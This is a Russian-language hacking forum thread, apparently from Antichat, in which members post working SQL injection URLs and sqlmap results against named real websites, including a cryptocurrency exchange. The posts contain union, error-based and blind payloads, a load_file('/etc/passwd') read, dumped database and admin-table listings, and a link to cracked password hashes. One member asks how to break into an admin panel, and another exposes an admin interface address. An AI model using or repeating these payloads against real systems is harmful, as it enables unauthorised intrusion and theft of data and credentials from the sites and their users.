SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    225
    Likes Received:
    375
    Reputations:
    100
    target: http://atmarine.fi
    type: Error-Based
    user: w8400337db@10.0.8.89
    db: 5.5.51-MariaDB
    Code:
    http://atmarine.fi/index.php?id=2 AND (SELECT 2796 FROM(SELECT COUNT(*),CONCAT_WS(CHAR(32,58,32),user(),database(),version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
    target: http://www.ubraintv.com

    type: Union-Based
    user: ubraintv@localhost
    db: 5.1.73 MySQL

    Code:
    http://www.ubraintv.com/watchchannel.php?id=6' UNION ALL SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7-- -
     
  2. Dri-M

    Dri-M New Member

    Joined:
    25 Nov 2012
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    www.yorgasmic.com/article.php?id=148


    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=148 AND 3436=3436
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=148 OR (SELECT 2443 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2443=2443,1))),0x7178706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=148 AND SLEEP(5)
    ---
     
    palec2006 likes this.
  3. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    308
    Likes Received:
    57
    Reputations:
    20
    ALEXA 12,361

    Code:
    http://singtao.ca/events/Thatcher/article.php?ID=1+union+all+select+null,null,null,load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
     
    #183 Vip77, 10 Dec 2017
    Last edited by a moderator: 11 Dec 2017
  4. Dri-M

    Dri-M New Member

    Joined:
    25 Nov 2012
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    http://www.aseanmarketplace.net/featured-listings.php?id=
    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause
        Payload: id=-2582 OR 5132=5132
    
        Type: AND/OR time-based blind
        Title: MySQL time-based blind - Parameter replace (MAKE_SET)
        Payload: id=MAKE_SET(8180=8180,SLEEP(5))
    ---
    available databases [2]:
    [*] amp
    [*] information_schema

    Table: admin
    [1 entry]
    +----+----------+----------------------------------+
    | id | username | password |
    +----+----------+----------------------------------+
    | 1 | читаем | первый пост |
    +----+----------+----------------------------------+


    в админпанельку как бы попасть в /administrator не пускает...

    как быть - мож кто подскажет....
     
    #184 Dri-M, 11 Dec 2017
    Last edited by a moderator: 11 Dec 2017
  5. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    49
    Likes Received:
    11
    Reputations:
    12
    Code:
    http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,version(),user(),7,database(),9,10,11,12,13,14--
    Code:
    http://www.jmtv.com/news.php?id=-3+union+select+1,version(),database()--
     
    #185 sepo, 16 Dec 2017
    Last edited by a moderator: 17 Dec 2017
  6. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    49
    Likes Received:
    11
    Reputations:
    12
    Code:
    http://plasticospardo.com/english/noticias.php?id=-16+union+select+1,2,version(),4,database(),user(),7--
     
  7. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,439
    Reputations:
    53
    PHP:
    http://manul.tv/watch_video.php?v=R6DW4G16RRS8%27+and+false+union+select+database(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+--+-
     
    Triton_Mgn likes this.
  8. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    225
    Likes Received:
    375
    Reputations:
    100
    target: http://illan-gifts.ru
    type:
    Error-Based
    user: wapp@localhost
    version: 5.5.52-MariaDB

    Code:
    http://illan-gifts.ru/1'and(ExtractValue(1,concat(0x5c,(user()))))and'
     
  9. qwaszx000

    qwaszx000 Member

    Joined:
    10 Feb 2018
    Messages:
    27
    Likes Received:
    14
    Reputations:
    7
    Code:
    http://www.jamestrussart.com/gallery.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11
    Выводится 2 номер.
     
    #189 qwaszx000, 13 Mar 2018
    Last edited: 13 Mar 2018
    Jerri likes this.
  10. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    49
    Likes Received:
    11
    Reputations:
    12
    Code:
    https://c2-europe.eu/news-full.php?id=-1049+union+select+1,2,3,version(),5,6,database(),8,9,10,user(),12,13,14--
    Code:
    http://monroerec.com/event.php?id=-24%27+UnIOn+SeLEcT+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
     
    #190 sepo, 10 Jul 2018
    Last edited by a moderator: 10 Jul 2018
  11. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    160
    Likes Received:
    39
    Reputations:
    1
    Code:
    https://www.unique-vintage.com/apps/swymEmails/interfaces/interfaceStore.php?appname=Emails
    Parameter: appname (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: appname=Emails' AND 8893=8893-- ZiPX
    ---
    [12:48:01] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL 5
    available databases [5]:
    [*] information_schema
    [*] mysql
    [*] pbcomput_swym
    [*] performance_schema
    [*] sys
    
     
  12. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,581
    Likes Received:
    398
    Reputations:
    230
    Code:
    https://www.mato-gmbh.com/produkte/mview'and(extractvalue(null,concat(1,(select+user()))))='1/251/?PHPSESSID=99f3768df8485b713f55dc60de16c1aa
     
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,581
    Likes Received:
    398
    Reputations:
    230
    DA49
    Code:
    https://www.bfz.de/seminarfinder?the_id=13&zieg_id=-8+union+select+1,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17+--+&foern_id=1&vanort=&umkreis=10&stichwort=&sort=entf&submitted=1
    Microsoft SQL Server 2008 R2 (SP3)
     
    shell_c0de and Gorev like this.
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,581
    Likes Received:
    398
    Reputations:
    230
  15. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    188
    Likes Received:
    162
    Reputations:
    25
  16. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    394
    Likes Received:
    37
    Reputations:
    1
    Биржа крипты, слепая инъекция.
    Code:
    sqlmap -u "https://www.ccnex.com/index.php?before_group=3&c=member_controller&m=upgrade&now_group=5&s=help&username=if" -p "username" --dbms=mysql --level=3 --risk=3 --random-agent --dbs
     
    BenderMR, sepo, shell_c0de and 2 others like this.
  17. Pirnazar

    Pirnazar Active Member

    Joined:
    28 Apr 2018
    Messages:
    152
    Likes Received:
    135
    Reputations:
    5
    Code:
    http://top.magreklama.ru/
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=260 AND 9312=9312
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=260 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 1 column
        Payload: id=-3254 UNION ALL SELECT CONCAT(0x71766a6a71,0x686e626c4b547a41514a7841524666765564447557656e73737257757144446b4845694370475458,0x717a767871)-- Tzua
    ---
    web server operating system: Linux Ubuntu
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS: MySQL >= 5.0.12
    ---
    web server operating system: Linux Ubuntu
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS: MySQL >= 5.0.12
    
    Расшифрованные хеши из таблицы rekl_kv_naozero.users виде hash:pass
    http://zalil.su/6334652
     
    #197 Pirnazar, 19 Oct 2018
    Last edited: 19 Oct 2018
  18. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    394
    Likes Received:
    37
    Reputations:
    1
  19. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    49
    Likes Received:
    11
    Reputations:
    12
    Code:
    ТЕКОМ - является динамично развивающейся телекоммуникационной компанией, накопившей солидный опыт в области проектирования, поставках и монтаже оборудования связи, а также предоставляющей услуги связи и доступа в Интернет. Мы предлагаем нашим клиентам эффективное и оперативное решение возникающих задач, связанных с организацией телефонной связи и эксплуатацией телекоммуникационного оборудования.
    Code:
    http://www.tecom.ru/internet.php?id=-3+union+select+1,version(),database()--
    Писал админам, но им оказалось похер на всё, так что решил выложить сюда...

    P.S. Также там есть ещё Административный Интерфейс CommuniGate Pro
    Code:
    http://81.3.154.236:8010/Master/MainAdmin/
     
  20. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    49
    Likes Received:
    11
    Reputations:
    12
    Code:
    https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,4,5,6,7,8,9--
    Code:
    https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9--
    Code:
    https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,table_name,5,6,7,8,9+from+information_schema.tables+limit%201,1--
    поменял...
     
    #200 sepo, 21 Nov 2018
    Last edited: 21 Nov 2018
    Pirnazar likes this.
Loading...